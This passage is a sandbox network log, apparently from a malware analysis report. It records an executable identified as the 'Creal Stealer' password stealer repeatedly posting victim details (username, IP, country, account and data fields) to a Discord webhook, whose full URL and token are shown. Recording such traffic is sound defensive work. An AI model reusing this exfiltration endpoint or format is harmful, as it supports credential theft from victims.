2024-09-27 16:18:51 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:51 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:51 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2ef510087cec11ef9c0d124b36f1d382; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453933 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oa0d3H%2B2YNBcftR3sjRCw%2FQB3NzMr0%2BeVBIlEkEODQGnMrwzoBzx7WtEGb26CEgkh0bCcwHPDczW5MHbCmM9HhP2eIBRk7Oj1zW3w%2B3Dg2yAN1KyrFnKIs5Qw9gW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2ef510087cec11ef9c0d124b36f1d3829bb0bb8cb584b865e3ac91dbc57d16d57a1b6b8c5f5ac0ee510533934fed87c6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:51 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 4b 4e 5f 4d 53 34 43 5f 5f 66 35 50 6d 71 41 67 6f 59 63 4a 54 32 4c 68 38 43 71 51 74 5f 6d 74 6f 77 65 38 43 64 5a 38 57 59 2d 31 37 32 37 34 35 33 39 33 31 33 38 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 65 61 38 33 33 34 31 63 36 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=QKN_MS4C__f5PmqAgoYcJT2Lh8CqQt_mtowe8CdZ8WY-1727453931384-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfdea83341c6-EWR
2024-09-27 16:18:51 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49725	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:51 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:51 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:51 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:51 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2f047d047cec11ef85ed067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 2 x-ratelimit-reset: 1727453933 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bxf253Q498%2FMMLryXIURf%2B7xKpYrAu88NpKMZTHnsiTA8b7tZYPo66pv%2B0cD8zA9TkbicREVvlXnoTvFNjya6MFVdkcjtFjlk%2Fruiz%2BKMvxtZYSzH59Nca222zzx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2f047d047cec11ef85ed067ba21bebfe0e5f5f20399985eeec12c0af5433f1f82f9e8a371b829c6091a4ab9a85478bd6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:51 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6f 4a 62 43 46 59 35 6c 6b 46 59 6e 34 73 6d 76 49 51 6d 6c 50 42 31 4a 50 53 70 48 38 30 56 45 65 4e 74 50 73 51 62 5f 62 6c 6b 2d 31 37 32 37 34 35 33 39 33 31 34 38 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 66 35 63 66 35 34 33 34 34 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=oJbCFY5lkFYn4smvIQmlPB1JPSpH80VEeNtPsQb_blk-1727453931486-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfdf5cf54344-EWR
2024-09-27 16:18:51 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49727	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:52 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:52 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:52 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:52 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2f6b5cf47cec11efb5ce16ad33b060f2; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453933 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3v%2Fgm%2FLVLFrHt9jdiQQvhGAvpqWdgmBYIsdriniRJOg3qteo5M0aZ9PdLhHvvSzcu4u2HyMGVdIZcef0oBWKdPanu7Ggc9tDbJeCFPHk3QtckzkduAWwJezubJ0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2f6b5cf47cec11efb5ce16ad33b060f2963a185fec13ac46aeceda20083a51363540c29048eb5cd51caff213e9f6819f; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:52 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 35 58 57 75 43 75 34 69 50 4e 2e 4d 7a 34 4f 54 73 47 56 43 55 78 30 4a 6e 51 43 68 57 52 38 6f 48 47 75 44 6e 5a 6b 6b 4f 30 2d 31 37 32 37 34 35 33 39 33 32 31 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 65 33 39 62 64 61 34 32 64 35 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=E5XWuCu4iPN.Mz4OTsGVCUx0JnQChWR8oHGuDnZkkO0-1727453932160-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfe39bda42d5-EWR
2024-09-27 16:18:52 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49728	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:52 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:52 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:52 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:52 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2fd62f207cec11ef9478bec7e893c0ff; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453934 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bu7Yqqwp7%2Bs2PSW5ZKNTIvzzPQP%2BbyqMy4bhi5pb2BOcSVoEp6DesiB6lZ6NZNEQxvrh8Hvg2zSlCzYV4ZF%2F07nQOi7tVyB4axRe8c%2F0vkP5YF26vHfk4o2hksl4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2fd62f207cec11ef9478bec7e893c0ff677f20117665331703391b771d5fb5f5649ddefc0a99d4b96ef86586658d0d02; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:52 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 2e 64 4e 44 71 2e 77 75 64 2e 72 48 2e 62 6c 6e 55 58 45 43 2e 74 70 69 6a 69 68 43 64 76 36 53 79 54 47 30 6b 6c 31 35 57 49 30 2d 31 37 32 37 34 35 33 39 33 32 38 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 65 37 66 63 31 30 37 32 39 30 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=.dNDq.wud.rH.blnUXEC.tpijihCdv6SyTG0kl15WI0-1727453932860-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfe7fc107290-EWR
2024-09-27 16:18:52 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49729	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:53 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:53 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:53 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:53 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=303ad38a7cec11ef894692cc3f667719; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453934 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QShPN%2FNf9IrmsETLd0ehwwIZZwBvBfju7kwZ89KsrZNl1IcCMbbO9m2EJ%2BZ5GdeB2D3Rs1LNXKoqZLvuWge4U7UntwlhP3pg44V561WKk830wsLkLJyQHOetI8EH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=303ad38a7cec11ef894692cc3f667719703d78845b9d2992d263c75fbc29682aa9f61d3feb155da2059d4a5c293e7801; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=8d94676341efb39bad306ebb92a7fe1d375736b4-1727453933; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:53 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 6c 63 49 4d 52 52 54 4f 61 45 4f 51 75 72 56 35 6a 61 77 6f 5f 78 57 65 34 2e 2e 52 57 2e 70 58 33 6d 4c 64 79 79 59 54 69 41 2d 31 37 32 37 34 35 33 39 33 33 35 32 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 65 63 32 63 66 32 34 32 31 31 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=ElcIMRRTOaEOQurV5jawo_xWe4..RW.pX3mLdyyYTiA-1727453933523-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfec2cf24211-EWR
2024-09-27 16:18:53 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49730	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:54 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:54 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:18:54 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:54 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=30a3d9207cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453935 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3uW8mhJQe3h6mjBPduwb7BN%2Bz7PDOoy0%2FruhAfZcAjpA8YDgxhTfgHXlMFvLkQm4gngaZlaprYk0m9N7F3ERT0c7KVLFJSjSGQ0WdUxpNdnXGOW7xjj2TjWbJ%2F%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=30a3d9207cec11ef96902e88ff694586d92bddde534c181d0b626fe8b7577f54e6bd291a31ce00edc8bf56a23921a6ef; Expires=Wed, 26-Sep-2029 16:18:54 GMT; 